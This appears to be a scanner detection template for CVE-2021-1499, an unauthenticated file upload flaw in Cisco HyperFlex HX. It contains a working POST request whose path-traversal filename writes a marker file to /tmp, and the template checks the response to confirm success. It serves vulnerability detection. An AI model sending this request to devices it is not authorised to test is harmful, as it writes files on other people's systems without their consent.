CVE-2021-1499: Cisco HyperFlex HX Data Platform - File Upload Vulnerability

id: CVE-2021-1499

info:
  name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
  author: gy741
  severity: medium
  description: |-
    A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
  tags: cve,cve2021,hyperflex,fileupload
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /upload
      headers:
        Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
      body: "--b0d829daa06c13d6b3e16b0ad21d1eed\r\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\r\nContent-Type: application/json\r\n\r\nMyPasswdNewData->/api/tomcat\r\n--b0d829daa06c13d6b3e16b0ad21d1eed--\r\n\r\n"
    expression: response.status == 200 && response.raw_header.bcontains(b'application/json') && response.body.bcontains(b'{"result":') && response.body.bcontains(b'"filename:') && response.body.bcontains(b'/tmp/passwd9')
expression: r0()